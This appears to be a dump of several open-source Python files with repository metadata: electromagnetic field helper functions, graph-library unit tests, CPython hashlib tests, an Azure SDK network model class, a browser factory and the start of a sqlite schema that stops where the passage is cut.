| code | repo_name | path | language | license | size |
|---|---|---|---|---|---|
| stringlengths 2 to 1.05M | stringlengths 5 to 104 | stringlengths 4 to 251 | stringclasses 1 value | stringclasses 15 values | int32 2 to 1.05M |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from SimPEG import Mesh, Utils
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from scipy.sparse import spdiags, csr_matrix, eye, kron, hstack, vstack, diags
import copy
from scipy.constants import mu_0
from SimPEG import SolverLU
from scipy.sparse.linalg import spsolve,splu
from SimPEG.EM import TDEM
from SimPEG.EM.Analytics.TDEM import hzAnalyticDipoleT,hzAnalyticCentLoopT
from scipy.interpolate import interp2d,LinearNDInterpolator
from scipy.special import ellipk,ellipe
def rectangular_plane_layout(mesh,corner, closed = False,I=1.):
"""
corner: sorted list of four corners (x,y,z)
2--3
| |
1--4
y
|
|--> x
Output:
Js
"""
Jx = np.zeros(mesh.nEx)
Jy = np.zeros(mesh.nEy)
Jz = np.zeros(mesh.nEz)
indy1 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEy[:,0]>=corner[0,0],mesh.gridEy[:,0]<=corner[1,0]), \
np.logical_and(mesh.gridEy[:,1] >=corner[0,1] , mesh.gridEy[:,1]<=corner[1,1] )),
(mesh.gridEy[:,2] == corner[0,2]
)
)
indx1 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEx[:,0]>=corner[1,0],mesh.gridEx[:,0]<=corner[2,0]), \
np.logical_and(mesh.gridEx[:,1] >=corner[1,1] , mesh.gridEx[:,1]<=corner[2,1] )),
(mesh.gridEx[:,2] == corner[1,2]
)
)
indy2 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEy[:,0]>=corner[2,0],mesh.gridEy[:,0]<=corner[3,0]), \
np.logical_and(mesh.gridEy[:,1] <=corner[2,1] , mesh.gridEy[:,1]>=corner[3,1] )),
(mesh.gridEy[:,2] == corner[2,2]
)
)
if closed:
indx2 = np.logical_and( \
np.logical_and( \
np.logical_and(mesh.gridEx[:,0]>=corner[0,0],mesh.gridEx[:,0]<=corner[3,0]), \
np.logical_and(mesh.gridEx[:,1] >=corner[0,1] , mesh.gridEx[:,1]<=corner[3,1] )),
(mesh.gridEx[:,2] == corner[0,2]
)
)
else:
indx2 = []
Jy[indy1] = -I
Jx[indx1] = -I
Jy[indy2] = I
Jx[indx2] = I
J = np.hstack((Jx,Jy,Jz))
J = J*mesh.edge
return J
def BiotSavart(locs,mesh,Js):
"""
Compute the magnetic field generated by current discretized on a mesh using Biot-Savart law
Input:
locs: observation locations
mesh: mesh on which the current J is discretized
Js: discretized source current in A-m (Finite Volume formulation)
Output:
B: magnetic field [Bx,By,Bz]
"""
c = mu_0/(4*np.pi)
nwire = np.sum(Js!=0.)
ind= np.where(Js!=0.)
ind = ind[0]
B = np.zeros([locs.shape[0],3])
gridE = np.vstack([mesh.gridEx,mesh.gridEy,mesh.gridEz])
for i in range(nwire):
# x wire
if ind[i]<mesh.nEx:
r = locs-gridE[ind[i]]
I = Js[ind[i]]*np.hstack([np.ones([locs.shape[0],1]),np.zeros([locs.shape[0],1]),np.zeros([locs.shape[0],1])])
cr = np.cross(I,r)
rsq = np.linalg.norm(r,axis=1)**3.
B = B + c*cr/rsq[:,None]
# y wire
elif ind[i]<mesh.nEx+mesh.nEy:
r = locs-gridE[ind[i]]
I = Js[ind[i]]*np.hstack([np.zeros([locs.shape[0],1]),np.ones([locs.shape[0],1]),np.zeros([locs.shape[0],1])])
cr = np.cross(I,r)
rsq = np.linalg.norm(r,axis=1)**3.
B = B + c*cr/rsq[:,None]
# z wire
elif ind[i]<mesh.nEx+mesh.nEy+mesh.nEz:
r = locs-gridE[ind[i]]
I = Js[ind[i]]*np.hstack([np.zeros([locs.shape[0],1]),np.zeros([locs.shape[0],1]),np.ones([locs.shape[0],1])])
cr = np.cross(I,r)
rsq = np.linalg.norm(r,axis=1)**3.
B = B + c*cr/rsq[:,None]
else:
print('error: index of J out of bounds (number of edges in the mesh)')
return B
def analytic_infinite_wire(obsloc,wireloc,orientation,I=1.):
"""
Compute the response of an infinite wire with orientation 'orientation'
    and current I at the observation locations obsloc
Output:
B: magnetic field [Bx,By,Bz]
"""
n,d = obsloc.shape
t,d = wireloc.shape
d = np.sqrt(np.dot(obsloc**2.,np.ones([d,t]))+np.dot(np.ones([n,d]),(wireloc.T)**2.)
- 2.*np.dot(obsloc,wireloc.T))
distr = np.amin(d, axis=1, keepdims = True)
idxmind = d.argmin(axis=1)
r = obsloc - wireloc[idxmind]
orient = np.c_[[orientation for i in range(obsloc.shape[0])]]
B = (mu_0*I)/(2*np.pi*(distr**2.))*np.cross(orientation,r)
return B
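# Sanity check: for a unit current along z-hat observed 1 m from the wire,
# Ampere's law gives |B| = mu_0*I/(2*pi*r) ~ 2.0e-7 T, which is what the
# expression above reduces to, since |cross(orientation, r)| ~ distr when r
# points to the closest discretized wire location.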
def mag_dipole(m,obsloc):
"""
    Compute the response of an infinitesimal magnetic dipole at location (0,0,0)
    oriented along z with magnetic moment 'm'
    at the observation locations obsloc
Output:
B: magnetic field [Bx,By,Bz]
"""
loc = np.r_[[[0.,0.,0.]]]
n,d = obsloc.shape
t,d = loc.shape
d = np.sqrt(np.dot(obsloc**2.,np.ones([d,t]))+np.dot(np.ones([n,d]),(loc.T)**2.)
- 2.*np.dot(obsloc,loc.T))
d = d.flatten()
ind = np.where(d==0.)
d[ind] = 1e6
x = obsloc[:,0]
y = obsloc[:,1]
z = obsloc[:,2]
#orient = np.c_[[orientation for i in range(obsloc.shape[0])]]
Bz = (mu_0*m)/(4*np.pi*(d**3.))*(3.*((z**2.)/(d**2.))-1.)
By = (mu_0*m)/(4*np.pi*(d**3.))*(3.*(z*y)/(d**2.))
Bx = (mu_0*m)/(4*np.pi*(d**3.))*(3.*(x*z)/(d**2.))
B = np.vstack([Bx,By,Bz]).T
return B
def circularloop(a,obsloc,I=1.):
"""
From Simpson, Lane, Immer, Youngquist 2001
Compute the magnetic field B response of a current loop
of radius 'a' with intensity 'I'.
input:
a: radius in m
    obsloc: observation locations
Output:
B: magnetic field [Bx,By,Bz]
"""
x = np.atleast_2d(obsloc[:,0]).T
y = np.atleast_2d(obsloc[:,1]).T
z = np.atleast_2d(obsloc[:,2]).T
r = np.linalg.norm(obsloc,axis=1)
loc = np.r_[[[0.,0.,0.]]]
n,d = obsloc.shape
r2 = x**2.+y**2.+z**2.
rho2 = x**2.+y**2.
alpha2 = a**2.+r2-2*a*np.sqrt(rho2)
beta2 = a**2.+r2+2*a*np.sqrt(rho2)
k2 = 1-(alpha2/beta2)
lbda = x**2.-y**2.
C = mu_0*I/np.pi
Bx = ((C*x*z)/(2*alpha2*np.sqrt(beta2)*rho2))*\
((a**2.+r2)*ellipe(k2)-alpha2*ellipk(k2))
Bx[np.isnan(Bx)] = 0.
By = ((C*y*z)/(2*alpha2*np.sqrt(beta2)*rho2))*\
((a**2.+r2)*ellipe(k2)-alpha2*ellipk(k2))
By[np.isnan(By)] = 0.
Bz = (C/(2.*alpha2*np.sqrt(beta2)))*\
((a**2.-r2)*ellipe(k2)+alpha2*ellipk(k2))
Bz[np.isnan(Bz)] = 0.
#print(Bx.shape)
#print(By.shape)
#print(Bz.shape)
B = np.hstack([Bx,By,Bz])
return B
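# Minimal far-field sanity sketch (assumes only the numpy/scipy imports above):
# far from a small loop of radius a carrying current I, circularloop should
# approach mag_dipole with moment m = I*pi*a**2.
if __name__ == '__main__':
    a, I = 10., 1.
    obs = np.c_[np.zeros(5), np.zeros(5), np.linspace(200., 400., 5)]
    B_loop = circularloop(a, obs, I=I)
    B_dip = mag_dipole(I*np.pi*a**2., obs)
    print(np.allclose(B_loop[:, 2], B_dip[:, 2], rtol=1e-2))  # expected: True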
| geoscixyz/em_examples | em_examples/Loop.py | Python | mit | 6,800 |
"""
Test the Multinet Class.
"""
import multinet as mn
import networkx as nx
class TestMultinet(object):
def test_build_multinet(self):
"""
Test building Multinet objects.
"""
mg = mn.Multinet()
assert mg.is_directed() == False
mg.add_edge(0, 1, 'L1')
mg.add_edge(0, 1, 'L2')
mg.add_edge(1, 0, 'L2')
mg.add_edge(1, 2, 'L2')
assert 'L1' in mg.layers()
assert 'L2' in mg.layers()
assert len(mg.edgelets) == 3
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 3
# Remove non-existed edge.
mg.remove_edgelet(2, 3, 'L3')
mg.remove_edgelet(0, 1, 'L2')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 2
mg.remove_edgelet(0, 1, 'L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 1
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 1
assert len(mg.empty_layers()) == 1
mg.remove_empty_layers()
assert mg.number_of_layers() == 1
def test_aggregate_edge(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['L2'] == 6
mg.add_edge(0, 1, 'L1', weight=10)
assert mg[0][1][mg.cid]['L1'] == 10
mg.aggregate_edge(0, 1, 'L1', weight=5)
assert mg[0][1][mg.cid]['L1'] == 15
mg.aggregate_edge(2, 3, 'L2', weight=7)
assert mg[2][3][mg.cid]['L2'] == 7
def test_sub_layer(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = mg.sub_layer('L1')
assert type(sg) == nx.Graph
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 1
sg = mg.sub_layer('L2', remove_isolates=True)
assert type(sg) == nx.Graph
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
def test_sub_layers(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
sg = mg.sub_layers(['L1', 'L2'])
assert type(sg) == mn.Multinet
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 2
assert sg.number_of_layers() == 2
sg = mg.sub_layers(['L2', 'L3'], remove_isolates=True)
assert type(sg) == mn.Multinet
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
assert sg.number_of_layers() == 2
def test_aggregated(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
ag = mg.aggregated()
assert type(ag) == nx.Graph
assert ag.number_of_nodes() == 3
assert ag.number_of_edges() == 2
assert ag[1][2]['weight'] == 8
assert ag[1][2]['nlayer'] == 2
def test_merge_layers(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L1', 'L2'])
assert 'L1' not in mg.layers()
assert 'L2' not in mg.layers()
assert 'L1_L2' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1_L2'] == 5
assert mg[1][2][mg.cid]['L1_L2'] == 6
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L2', 'L3'], new_name='LN')
assert 'L2' not in mg.layers()
assert 'L3' not in mg.layers()
assert 'LN' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['LN'] == 8
def test_add_layer(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = nx.Graph()
sg.add_edge(1, 2, weight=7)
sg.add_edge(2, 3)
mg.add_layer(sg, 'L3')
assert mg.number_of_nodes() == 4
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 3
assert mg[1][2][mg.cid]['L2'] == 6
assert mg[1][2][mg.cid]['L3'] == 7
assert mg[2][3][mg.cid]['L3'] == 1
def test_remove_layer(self):
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L3')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
mg = mn.Multinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 1
assert mg.number_of_layers() == 2
class TestDiMultinet(object):
def test_build_dimultinet(self):
"""
Test building Multinet objects.
"""
mg = mn.DiMultinet()
assert mg.is_directed() == True
mg.add_edge(0, 1, 'L1')
mg.add_edge(0, 1, 'L2')
mg.add_edge(1, 0, 'L2')
mg.add_edge(1, 2, 'L2')
assert 'L1' in mg.layers()
assert 'L2' in mg.layers()
assert len(mg.edgelets) == 4
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 4
# Remove non-existed edge.
mg.remove_edgelet(2, 3, 'L3')
mg.remove_edgelet(0, 1, 'L2')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 3
mg.remove_edgelet(0, 1, 'L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
assert mg.number_of_edgelets() == 2
assert len(mg.empty_layers()) == 1
mg.remove_empty_layers()
assert mg.number_of_layers() == 1
def test_aggregate_edge(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['L2'] == 6
mg.add_edge(0, 1, 'L1', weight=10)
assert mg[0][1][mg.cid]['L1'] == 10
mg.aggregate_edge(0, 1, 'L1', weight=5)
assert mg[0][1][mg.cid]['L1'] == 15
mg.aggregate_edge(2, 3, 'L2', weight=7)
assert mg[2][3][mg.cid]['L2'] == 7
def test_sub_layer(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = mg.sub_layer('L1')
assert type(sg) == nx.DiGraph
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 1
sg = mg.sub_layer('L2', remove_isolates=True)
assert type(sg) == nx.DiGraph
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
def test_sub_layers(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
sg = mg.sub_layers(['L1', 'L2'])
assert type(sg) == mn.DiMultinet
assert sg.number_of_nodes() == 3
assert sg.number_of_edges() == 2
assert sg.number_of_layers() == 2
sg = mg.sub_layers(['L2', 'L3'], remove_isolates=True)
assert type(sg) == mn.DiMultinet
assert sg.number_of_nodes() == 2
assert sg.number_of_edges() == 1
assert sg.number_of_layers() == 2
def test_aggregated(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
ag = mg.aggregated()
assert type(ag) == nx.DiGraph
assert ag.number_of_nodes() == 3
assert ag.number_of_edges() == 2
assert ag[1][2]['weight'] == 8
assert ag[1][2]['nlayer'] == 2
def test_merge_layers(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L1', 'L2'])
assert 'L1' not in mg.layers()
assert 'L2' not in mg.layers()
assert 'L1_L2' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1_L2'] == 5
assert mg[1][2][mg.cid]['L1_L2'] == 6
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.merge_layers(['L2', 'L3'], new_name='LN')
assert 'L2' not in mg.layers()
assert 'L3' not in mg.layers()
assert 'LN' in mg.layers()
assert mg.number_of_layers() == 2
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg[0][1][mg.cid]['L1'] == 5
assert mg[1][2][mg.cid]['LN'] == 8
def test_add_layer(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
sg = nx.Graph()
sg.add_edge(1, 2, weight=7)
sg.add_edge(2, 3)
mg.add_layer(sg, 'L3')
assert mg.number_of_nodes() == 4
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 3
assert mg[1][2][mg.cid]['L2'] == 6
assert mg[1][2][mg.cid]['L3'] == 7
assert mg[2][3][mg.cid]['L3'] == 1
def test_remove_layer(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L3')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 2
assert mg.number_of_layers() == 2
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(1, 2, 'L3', weight=2)
mg.remove_layer('L1')
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 1
assert mg.number_of_layers() == 2
def test_to_undirected(self):
mg = mn.DiMultinet()
mg.add_edge(0, 1, 'L1', weight=5)
mg.add_edge(1, 2, 'L2', weight=6)
mg.add_edge(2, 1, 'L3', weight=2)
assert mg.number_of_nodes() == 3
assert mg.number_of_edges() == 3
assert mg.number_of_layers() == 3
nmg = mg.to_undirected()
assert nmg.number_of_nodes() == 3
assert nmg.number_of_edges() == 2
assert nmg.number_of_layers() == 3
| wuhaochen/multinet | multinet/tests/test_classes.py | Python | mit | 11,570 |
# Test hashlib module
#
# $Id: test_hashlib.py 79216 2010-03-21 19:16:28Z georg.brandl $
#
# Copyright (C) 2005-2010 Gregory P. Smith ([email protected])
# Licensed to PSF under a Contributor Agreement.
#
import hashlib
import unittest
from test import test_support
from test.test_support import _4G, precisionbigmemtest
def hexstr(s):
import string
h = string.hexdigits
r = ''
for c in s:
i = ord(c)
r = r + h[(i >> 4) & 0xF] + h[i & 0xF]
return r
class HashLibTestCase(unittest.TestCase):
supported_hash_names = ( 'md5', 'MD5', 'sha1', 'SHA1',
'sha224', 'SHA224', 'sha256', 'SHA256',
'sha384', 'SHA384', 'sha512', 'SHA512' )
def test_unknown_hash(self):
try:
hashlib.new('spam spam spam spam spam')
except ValueError:
pass
else:
self.assert_(0 == "hashlib didn't reject bogus hash name")
def test_hexdigest(self):
for name in self.supported_hash_names:
h = hashlib.new(name)
self.assert_(hexstr(h.digest()) == h.hexdigest())
def test_large_update(self):
aas = 'a' * 128
bees = 'b' * 127
cees = 'c' * 126
for name in self.supported_hash_names:
m1 = hashlib.new(name)
m1.update(aas)
m1.update(bees)
m1.update(cees)
m2 = hashlib.new(name)
m2.update(aas + bees + cees)
self.assertEqual(m1.digest(), m2.digest())
def check(self, name, data, digest):
# test the direct constructors
computed = getattr(hashlib, name)(data).hexdigest()
self.assert_(computed == digest)
# test the general new() interface
computed = hashlib.new(name, data).hexdigest()
self.assert_(computed == digest)
def test_case_md5_0(self):
self.check('md5', '', 'd41d8cd98f00b204e9800998ecf8427e')
def test_case_md5_1(self):
self.check('md5', 'abc', '900150983cd24fb0d6963f7d28e17f72')
def test_case_md5_2(self):
self.check('md5', 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',
'd174ab98d277d9f5a5611c2c9f419d9f')
@precisionbigmemtest(size=_4G + 5, memuse=1)
def test_case_md5_huge(self, size):
if size == _4G + 5:
try:
self.check('md5', 'A'*size, 'c9af2dff37468ce5dfee8f2cfc0a9c6d')
except OverflowError:
pass # 32-bit arch
@precisionbigmemtest(size=_4G - 1, memuse=1)
def test_case_md5_uintmax(self, size):
if size == _4G - 1:
try:
self.check('md5', 'A'*size, '28138d306ff1b8281f1a9067e1a1a2b3')
except OverflowError:
pass # 32-bit arch
# use the three examples from Federal Information Processing Standards
# Publication 180-1, Secure Hash Standard, 1995 April 17
# http://www.itl.nist.gov/div897/pubs/fip180-1.htm
def test_case_sha1_0(self):
self.check('sha1', "",
"da39a3ee5e6b4b0d3255bfef95601890afd80709")
def test_case_sha1_1(self):
self.check('sha1', "abc",
"a9993e364706816aba3e25717850c26c9cd0d89d")
def test_case_sha1_2(self):
self.check('sha1', "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"84983e441c3bd26ebaae4aa1f95129e5e54670f1")
def test_case_sha1_3(self):
self.check('sha1', "a" * 1000000,
"34aa973cd4c4daa4f61eeb2bdbad27316534016f")
# use the examples from Federal Information Processing Standards
# Publication 180-2, Secure Hash Standard, 2002 August 1
# http://csrc.nist.gov/publications/fips/fips180-2/fips180-2.pdf
def test_case_sha224_0(self):
self.check('sha224', "",
"d14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f")
def test_case_sha224_1(self):
self.check('sha224', "abc",
"23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7")
def test_case_sha224_2(self):
self.check('sha224',
"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"75388b16512776cc5dba5da1fd890150b0c6455cb4f58b1952522525")
def test_case_sha224_3(self):
self.check('sha224', "a" * 1000000,
"20794655980c91d8bbb4c1ea97618a4bf03f42581948b2ee4ee7ad67")
def test_case_sha256_0(self):
self.check('sha256', "",
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855")
def test_case_sha256_1(self):
self.check('sha256', "abc",
"ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad")
def test_case_sha256_2(self):
self.check('sha256',
"abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
"248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1")
def test_case_sha256_3(self):
self.check('sha256', "a" * 1000000,
"cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0")
def test_case_sha384_0(self):
self.check('sha384', "",
"38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da"+
"274edebfe76f65fbd51ad2f14898b95b")
def test_case_sha384_1(self):
self.check('sha384', "abc",
"cb00753f45a35e8bb5a03d699ac65007272c32ab0eded1631a8b605a43ff5bed"+
"8086072ba1e7cc2358baeca134c825a7")
def test_case_sha384_2(self):
self.check('sha384',
"abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmn"+
"hijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu",
"09330c33f71147e83d192fc782cd1b4753111b173b3b05d22fa08086e3b0f712"+
"fcc7c71a557e2db966c3e9fa91746039")
def test_case_sha384_3(self):
self.check('sha384', "a" * 1000000,
"9d0e1809716474cb086e834e310a4a1ced149e9c00f248527972cec5704c2a5b"+
"07b8b3dc38ecc4ebae97ddd87f3d8985")
def test_case_sha512_0(self):
self.check('sha512', "",
"cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"+
"47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e")
def test_case_sha512_1(self):
self.check('sha512', "abc",
"ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a9eeee64b55d39a"+
"2192992a274fc1a836ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49f")
def test_case_sha512_2(self):
self.check('sha512',
"abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmn"+
"hijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu",
"8e959b75dae313da8cf4f72814fc143f8f7779c6eb9f7fa17299aeadb6889018"+
"501d289e4900f7e4331b99dec4b5433ac7d329eeb6dd26545e96e55b874be909")
def test_case_sha512_3(self):
self.check('sha512', "a" * 1000000,
"e718483d0ce769644e2e42c7bc15b4638e1f98b13b2044285632a803afa973eb"+
"de0ff244877ea60a4cb0432ce577c31beb009c5c2c49aa2e4eadb217ad8cc09b")
def test_main():
test_support.run_unittest(HashLibTestCase)
if __name__ == "__main__":
test_main()
| babyliynfg/cross | tools/project-creator/Python2.6.6/Lib/test/test_hashlib.py | Python | mit | 7,399 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class VirtualNetworkPeering(SubResource):
"""Peerings in a virtual network resource.
:param id: Resource ID.
:type id: str
:param allow_virtual_network_access: Whether the VMs in the linked virtual
network space would be able to access all the VMs in local Virtual network
space.
:type allow_virtual_network_access: bool
:param allow_forwarded_traffic: Whether the forwarded traffic from the VMs
in the remote virtual network will be allowed/disallowed.
:type allow_forwarded_traffic: bool
:param allow_gateway_transit: If gateway links can be used in remote
virtual networking to link to this virtual network.
:type allow_gateway_transit: bool
:param use_remote_gateways: If remote gateways can be used on this virtual
network. If the flag is set to true, and allowGatewayTransit on remote
peering is also true, virtual network will use gateways of remote virtual
network for transit. Only one peering can have this flag set to true. This
flag cannot be set if virtual network already has a gateway.
:type use_remote_gateways: bool
:param remote_virtual_network: The reference of the remote virtual
network. The remote virtual network can be in the same or different region
(preview). See here to register for the preview and learn more
(https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-create-peering).
:type remote_virtual_network:
~azure.mgmt.network.v2017_11_01.models.SubResource
:param remote_address_space: The reference of the remote virtual network
address space.
:type remote_address_space:
~azure.mgmt.network.v2017_11_01.models.AddressSpace
:param peering_state: The status of the virtual network peering. Possible
values are 'Initiated', 'Connected', and 'Disconnected'. Possible values
include: 'Initiated', 'Connected', 'Disconnected'
:type peering_state: str or
~azure.mgmt.network.v2017_11_01.models.VirtualNetworkPeeringState
:param provisioning_state: The provisioning state of the resource.
:type provisioning_state: str
:param name: The name of the resource that is unique within a resource
group. This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'allow_virtual_network_access': {'key': 'properties.allowVirtualNetworkAccess', 'type': 'bool'},
'allow_forwarded_traffic': {'key': 'properties.allowForwardedTraffic', 'type': 'bool'},
'allow_gateway_transit': {'key': 'properties.allowGatewayTransit', 'type': 'bool'},
'use_remote_gateways': {'key': 'properties.useRemoteGateways', 'type': 'bool'},
'remote_virtual_network': {'key': 'properties.remoteVirtualNetwork', 'type': 'SubResource'},
'remote_address_space': {'key': 'properties.remoteAddressSpace', 'type': 'AddressSpace'},
'peering_state': {'key': 'properties.peeringState', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, id=None, allow_virtual_network_access=None, allow_forwarded_traffic=None, allow_gateway_transit=None, use_remote_gateways=None, remote_virtual_network=None, remote_address_space=None, peering_state=None, provisioning_state=None, name=None, etag=None):
super(VirtualNetworkPeering, self).__init__(id=id)
self.allow_virtual_network_access = allow_virtual_network_access
self.allow_forwarded_traffic = allow_forwarded_traffic
self.allow_gateway_transit = allow_gateway_transit
self.use_remote_gateways = use_remote_gateways
self.remote_virtual_network = remote_virtual_network
self.remote_address_space = remote_address_space
self.peering_state = peering_state
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
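# Illustrative sketch (the resource id below is a placeholder, not a real
# value): a peering is typically constructed with keyword arguments and
# serialized by the msrest layer, e.g.
#   peering = VirtualNetworkPeering(
#       allow_virtual_network_access=True,
#       allow_forwarded_traffic=False,
#       remote_virtual_network=SubResource(id='<remote-vnet-resource-id>'))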
| AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_11_01/models/virtual_network_peering.py | Python | mit | 4,677 |
# -*- coding: utf-8 -*-
import sys
sys.path.append('../browser_interface/browser')
class BrowserFactory(object):
def create(self, type, *args, **kwargs):
return getattr(__import__(type), type)(*args, **kwargs)
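    # Usage sketch ('Chrome' is a hypothetical module/class name): assuming a
    # module Chrome.py on the path that defines a class Chrome,
    #     BrowserFactory().create('Chrome', headless=True)
    # imports that module and returns Chrome(headless=True).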
| xtuyaowu/jtyd_python_spider | browser_interface/browser/BrowserFactory.py | Python | mit | 225 |
# -*- coding: utf-8 -*-
import sqlite3
VERBOSE = 0
CTABLE_DOMAIN = '''
CREATE TABLE IF NOT EXISTS Domains(
did INTEGER PRIMARY KEY AUTOINCREMENT,
domain VARCHAR(64) UNIQUE,
indegree INTEGER,
outdegree INTEGER
)'''
CTABLE_WEBSITE = '''
